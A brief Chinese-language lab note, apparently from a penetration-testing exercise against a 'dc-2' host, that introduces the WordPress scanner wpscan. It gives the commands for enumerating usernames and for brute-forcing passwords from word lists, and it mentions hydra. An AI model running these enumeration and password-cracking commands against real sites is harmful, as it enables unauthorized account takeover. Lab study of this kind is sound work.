本章记录wpscan、 jooscan
wpscan是一款专门针对WordPress(CMS的一种)安全扫描器
kali中一款漏洞扫描工具,采用Ruby编写,wpscan是一款专门针对WordPress安全扫描器,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。
使用wpscan扫描用户:
命令:wpscan --url http://dc-2 --enumerate u #暴力枚举用户名。
命令2:wpscan --ignore-main-redirect --url 192.168.4.128 --enumerate u --force
将枚举出的用户名保存到一个txt文件中,
用hydra进行密码爆破;
或者使用wpscan进行密码爆破:
命令:root@kali:~# wpscan --ignore-main-redirect --url 192.168.4.128 -U dc-2_user.txt -P dc2_passwords.txt --force